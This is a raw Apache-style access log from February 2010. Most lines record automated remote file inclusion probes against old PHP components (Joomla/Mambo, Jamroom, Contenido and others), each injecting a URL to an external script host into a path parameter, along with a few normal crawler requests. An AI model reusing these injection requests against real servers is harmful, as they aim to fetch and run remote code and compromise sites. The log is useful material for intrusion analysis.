82.151.132.176 - - [07/Feb/2010:06:01:14 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:14 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:19 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:20 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:20 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:01:25 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:01:47 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:01:47 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:01:47 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:01:49 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:01:49 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:01:49 -0800] "GET /logs/access_100107.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:01:57 -0800] "GET /logs/access_100110.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:02:34 -0800] "GET /logs/access_100201.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:06:02:49 -0800] "GET /logs/access_100111.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:06:02:54 -0800] "GET /logs/access_100108.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:06:02:56 -0800] "GET /logs/access_100122.log%20//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:03:48 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:03:48 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:03:49 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:03:54 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:03:54 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:03:54 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:03:54 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:03:58 -0800] "GET /logs/access_100110.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:04:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:04:01 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:04:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:04:07 -0800] "GET /logs/access_100110.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:04:36 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:04:36 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:06:04:37 -0800] "GET /logs/access_100108.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:04:52 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:04:52 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:04:52 -0800] "GET /delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [07/Feb/2010:06:04:52 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:20 -0800] "GET /convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:20 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:20 -0800] "GET /logs/access_100106.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:28 -0800] "GET /logs/access_100106.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:28 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:05:28 -0800] "GET /convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.131.106.31 - - [07/Feb/2010:06:05:42 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.puaga.com"
88.131.106.31 - - [07/Feb/2010:06:05:42 -0800] "GET /ideal/forum/viewtopic.php?p=27081 HTTP/1.0" 404 5258 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:06:17 -0800] "GET /logs/access_100109.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:06:22 -0800] "GET /logs/access_100109.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:06:28 -0800] "GET /convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:06:28 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:06:28 -0800] "GET /logs/access_100106.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:06:32 -0800] "GET /logs/access_100112.log/components/com_forum/download.php?phpbb_root_path=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:07:28 -0800] "GET /logs/access_100109.log%20%20/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:36 -0800] "GET /logs/access_100113.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:36 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:36 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:40 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:40 -0800] "GET /logs/access_100113.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:40 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:57 -0800] "GET /logs/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:57 -0800] "GET /logs/access_100127.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:07:58 -0800] "GET /?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:08:03 -0800] "GET /logs/access_100127.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:08:03 -0800] "GET /logs/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:08:04 -0800] "GET /?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:09:26 -0800] "GET /logs/access_100107.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:09:44 -0800] "GET /logs/access_100107.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.212.224.183 - - [07/Feb/2010:06:10:25 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.puaga.com"
217.212.224.181 - - [07/Feb/2010:06:10:26 -0800] "GET /login/register.php HTTP/1.0" 200 4973 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:10:31 -0800] "GET /logs/access_100125.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:06:10:55 -0800] "GET /logs/access_100125.log%20%20/?mosConfig_absolute_path=http://www.koreanaztimes.com/zero/script/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:11:16 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:11:16 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:11:16 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:11:21 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:06:13:48 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:06:13:48 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:06:13:48 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:13 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:13 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:13 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:17 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:14:18 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:14:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:14:18 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:18 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:18 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:22 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:22 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:22 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:24 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:24 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:24 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:33 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:33 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:33 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:35 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:35 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:14:35 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:06:14:47 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:06:15:45 -0800] "GET /logs/access_091025.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:06:15:47 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091025.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:16:56 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:16:56 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:16:56 -0800] "GET /logs/access_100122.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:16:56 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:16:56 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:16:56 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:17:01 -0800] "GET /logs/access_100115.log%20%20/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:17:01 -0800] "GET /logs/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:17:01 -0800] "GET /index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
